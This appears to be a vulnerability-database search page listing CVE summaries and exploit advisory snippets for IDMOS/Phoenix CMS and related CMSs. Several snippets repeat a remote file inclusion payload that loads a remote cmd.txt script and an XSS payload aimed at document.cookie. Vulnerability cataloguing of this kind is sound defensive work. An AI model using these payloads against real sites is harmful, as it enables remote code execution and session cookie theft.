1699 matches found
Directory traversal
Directory traversal vulnerability in administrator/download.php in IDMOS aka Phoenix 1.0 allows remote attackers to read arbitrary files via a .. dot dot in the fileName parameter...
CVE-2008-0431
CVE-2008-0431 affects IDMOS (aka Phoenix) 1.0, where the administrator/download.php handler is vulnerable to directory traversal via the fileName parameter (..). This allows remote attackers to read arbitrary files on the affected system. The issue is triggered by an invalid path input and result...
CVE-2007-5889
CVE-2007-5889 describes PHP remote file inclusion vulnerabilities in IDMOS 1.0 Alpha (aka Phoenix). The affected components are the admin-facing scripts (admin.php, menu_add.php, menu_operation.php) under the administrator/ path, where a URL passed to site_absolute_path can cause arbitrary PHP co...
CVE-2007-5293
Multiple cross-site scripting XSS vulnerabilities in IDMOS 1.0-beta aka Phoenix allow remote attackers to inject arbitrary web script or HTML via the 1 errmsg parameter to error.php and the 2 content parameter to templates/simple/ia.php...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in IDMOS 1.0-beta aka Phoenix allow remote attackers to inject arbitrary web script or HTML via the 1 errmsg parameter to error.php and the 2 content parameter to templates/simple/ia.php...
Remote file inclusion
PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...
CVE-2007-5294
PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...
CVE-2007-5294
CVE-2007-5294 affects IDMOS 1.0-beta (aka Phoenix); a PHP remote file inclusion flaw exists in core/aural.php that allows an attacker to execute arbitrary PHP code via a site_absolute_path URL parameter. The description confirms remote code execution via a crafted URL, but the connected documents...
CVE-2007-5293
The CVE-2007-5293 entry documents XSS vulnerabilities in IDMOS 1.0-beta (aka Phoenix). The issues affect two input vectors: the err_msg parameter to error.php and the content parameter to templates/simple/ia.php, both enabling remote attackers to inject arbitrary web script or HTML. The core caus...
idmos-xss.txt
Hello,, IDM-OS idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss error.php?errmsg=alertdocument.cookie;...
idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability
No description provided by source. idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss...
idmos-phoenix CMS - aural.php Remote File Inclusion
idmos-phoenix CMS - aural.php Remote File Inclusion idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss...
idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================= idmos-phoenix cms aural.php Remote File Inclusion Vulnerability ================================================================= idmos-phoenix cms Remote File inclusion...
idmos-phoenix CMS - 'aural.php' Remote File Inclusion
idmos-phoenix cms Remote File inclusion Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] RFI core/aural.php?siteabsolutepath=http://localhost/cmd.txt?&cmd=dir Xss error.php?errmsg=alertdocument.cookie;...
With Phoenix universal boot disk to resolve local/domain administrator password lost-vulnerability warning-the black bar safety net
The local administrator password is lost, by deleting the SAM file, or by NTPASSWORD software solution. But to solve the domain administrator password is lost, they can not do anything. Then you need to use“Phoenix universal boot disk”, this article will discuss in detail the use of this disk to...
PostNuke多个远程输入验证漏洞
PostNuke是一款开放源码、开放开发的内容管理系统(CMS)。PostNuke中存在多个输入验证漏洞,起因是应用程序没能正确的过滤用户提供的输入。SQL注入漏洞可能允许远程攻击者向数据库查询提供恶意输入,导致修改查询逻辑或其他攻击。成功的攻击可能导致入侵应用程序,泄漏或修复数据,或允许攻击者利用基础数据库实现中的漏洞。 PostNuke还受多个跨站脚本漏洞的影响。攻击者可能利用这些漏洞在没有戒备用户的浏览器中执行任意脚本代码,导致窃取基于cookie的认证凭据或其他攻击。 Phoenix 0.750-0.760-RC3...
CVE-2006-5090
Multiple cross-site scripting XSS vulnerabilities in Phoenix Evolution CMS PECMS allow remote attackers to inject arbitrary web script or HTML via the 1 mod or 2 action parameters in index.php, or the 3 pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is...
CVE-2006-5090
Multiple cross-site scripting XSS vulnerabilities in Phoenix Evolution CMS PECMS allow remote attackers to inject arbitrary web script or HTML via the 1 mod or 2 action parameters in index.php, or the 3 pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is...
Phoenix Evolution CMS - index.php Multiple Cross-Site Scripting Vulnerabilities
Phoenix Evolution CMS - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may...
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...